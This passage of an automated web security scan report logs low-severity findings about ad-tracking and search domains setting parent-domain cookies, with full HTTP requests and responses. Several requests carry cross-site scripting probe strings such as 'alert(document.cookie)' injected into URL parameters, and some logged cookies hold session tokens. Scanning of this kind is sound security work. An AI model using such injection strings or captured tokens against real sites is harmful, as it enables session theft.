Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.141. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1748518845;fpan=1;fpa=P0-2130372027-1295906131971;ns=1;url=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D2290%2F2289%2F1%3Bs%3D788%3Bd%3D9%3Bw%3D300%3Bh%3D250;ref=http%3A%2F%2Fwww1.whdh.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1295906131970;tzo=360;a=p-02uqnnIGWyZdo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EO0ADqANq0itiBABlQEB7gWB8gCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Server: QS

13.142. http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/p-9dsZX-5zhUuTg.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-9dsZX-5zhUuTg.js HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=ELIADqANq0itiBABswEB8QWB0wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S18099:E0-1972111918-1295924804754"
Cache-Control: private, no-transform, max-age=600
Expires: Tue, 25 Jan 2011 03:16:44 GMT
Content-Length: 548
Date: Tue, 25 Jan 2011 03:06:44 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...

13.143. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=3615 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; khaos=GIPAEQ2D-C-IOYY; lm="9 Jan 2011 02:15:20 GMT"; cd=false; put_2081=CA-00000000456885722; rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1; rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C%263615%3D9329%2C0%2C1%2C%2C; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.144. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=4&mpid=1051202&fpid=3&rnd=3797505172801460594&nu=n&sp=y
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 01:35:45 GMT

GIF89a.............!.......,...........D..;

13.145. http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ACID=Bc330012940999670074; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; ROLL=v5Q2V0M9itzqEXE!;

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 24 Jan 2011 22:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:49:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Date: Mon, 24 Jan 2011 22:03:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cs
...[SNIP]...

13.147. http://rcm.amazon.com/e/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rcm.amazon.com
Path:	/e/cm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

13.148. http://rd.apmebf.com/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&
...[SNIP]...

13.149. http://scholar.google.com/schhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=b5f8ca2c9be5aa39; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:15 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...

13.150. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://scholar.google.com/schhp?hl=en&as_sdt=0,9
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=ba854cced93b2364; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Content-Length: 249
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://scholar.google.com/schhp?
...[SNIP]...

13.151. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
